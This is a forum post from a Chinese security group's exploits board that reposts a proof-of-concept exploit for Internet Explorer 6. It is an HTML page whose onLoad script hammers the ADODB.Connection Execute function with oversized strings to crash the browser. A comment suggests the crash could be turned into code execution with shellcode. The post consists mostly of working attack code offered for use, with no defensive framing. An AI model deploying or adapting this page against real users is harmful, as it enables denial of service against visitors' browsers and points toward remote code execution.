MS Internet Explorer (ADODB Execute) Denial of Service PoC

pub!1c

魔

团队执行官

Rank: 8 Rank: 8

E.S.T核心成员

帖子: 3926
精华: 128
积分: 209876
阅读权限: 200
性别: 男
在线时间: 1119 小时
注册时间: 2007-10-23
最后登录: 2009-1-4

资料收集奖运营支持奖

发短消息
加为好友
当前离线

楼主大中小发表于 2006-10-24 22:37 只看该作者

MS Internet Explorer (ADODB Execute) Denial of Service PoC

复制内容到剪贴板

代码:

<!--

// Internet Explorer &#39;ADODB.Connection&#39; object &#39;Execute&#39; Function Vulnerability POC

// tested on Windows XP SP1/XP SP2, IE 6.0 with latest patches installed

// Author: YAG KOHHA (skyhole [at] gmail.com)

// Greetz: H D Moor, Dark Eagle, str0ke, Maxus, Fuchunic, Offtopic



// Access violation at:

// ----------------------------------------------------

// 77114D0F  66:8B75 00     MOV SI,WORD PTR SS:[EBP]

// ----------------------------------------------------

// P.S. It`s will be fast with some shellcode :P

--!>



<html>

<head>

<title>ADODB.Connection.Execute CRASH TEST</title>

</head>

<script>

function Bang_Bang() {

var a = new ActiveXObject(&#39;ADODB.Connection.2.7&#39;);

var b = &#39;FUCK&#39;;

while (b.length <= 1024*256) b+=b;

for (var i = 0; i < 32768; i++)

try { a.Execute(b,b,b); } catch(e) {}

}

</script>

<body onLoad=&#39;Bang_Bang()&#39;>

<center><h1>WOW!!! Are U live?</h1></center>

</body></html>

TOP

‹‹ 上一主题 | 下一主题 ››

邪恶八进制信息安全团队技术讨论组 » 安全测试代码{ Exploits and Shellcode } » MS Internet Explorer (ADODB Execute) Denial of Service PoC